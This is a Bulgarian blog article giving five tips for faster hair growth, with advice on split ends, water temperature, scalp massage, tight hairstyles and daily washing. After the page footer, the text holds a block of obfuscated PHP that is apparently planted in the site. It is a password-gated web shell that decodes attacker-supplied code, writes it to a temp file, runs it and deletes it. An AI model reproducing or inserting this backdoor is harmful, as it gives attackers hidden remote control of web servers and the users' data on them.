Как да се грижим за косата, за да расте по- бързо? Виж Тук: | Косопад

Как да се грижим за косата, за да расте по- бързо? Виж Тук:

Омръзнало ви е косата все да не расте така, както ви се иска? Предлагаме ви серия от полезни съвети, които да ви ориентират какво можете да направите или какво да не правите, за да имате желаните резултати.

1. Винаги здрави върхове. Това е изключително важно, ако искате косата ви да расте. Когато не се поддържат връхчетата на косата, нацъфтели са и са изсъхнали, се късат изключително лесно. Така че, колкото повече се грижите за тях, по- малко ще се късат и косата ще расте с нормални темпове.

2. Внимавайте с горещата вода. Фризьорите са категорични, че горещата вода уврежда скалпа и отнема блясъка на косата. Затова, косата трябва да се мие с хладка вода, а плакненето е желателно да бъде със студена, тъй като по този начин се затварят космените фоликули.

3. Масажиране на скалпа. Винаги помага! Когато правите масаж на скалпа с върха на пръстите, се стимулира кръвообращението в зоната и така се улеснява растежа на косата. Може да се прави също и с четка. Но зъбите трябва да са нежни и от естествен косъм.

4. Внимавайте с прическите, които опъват косата. Ако се случва рядко, няма проблем. Но ако се прави постоянно, косъмът отслабва и започва лесно да се къса. Така че, когато захващате косата по някакъв начин, бъдете много внимателни.

5. И накрая… внимавайте с ежедневното миене. По този начин премахваме естествените мазнини от скалпа и го изсушаваме. А това улеснява падането на косата.

05. октомври 2017 10:21:43 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}